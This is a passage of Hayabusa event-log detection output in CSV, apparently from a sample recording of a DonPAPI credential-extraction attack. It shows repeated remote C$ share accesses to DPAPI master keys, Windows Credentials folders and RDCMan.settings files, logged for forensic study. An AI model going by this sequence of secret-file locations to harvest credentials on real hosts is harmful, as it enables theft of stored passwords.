0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.912 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.977 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.978 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network 
Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.034 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.037 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 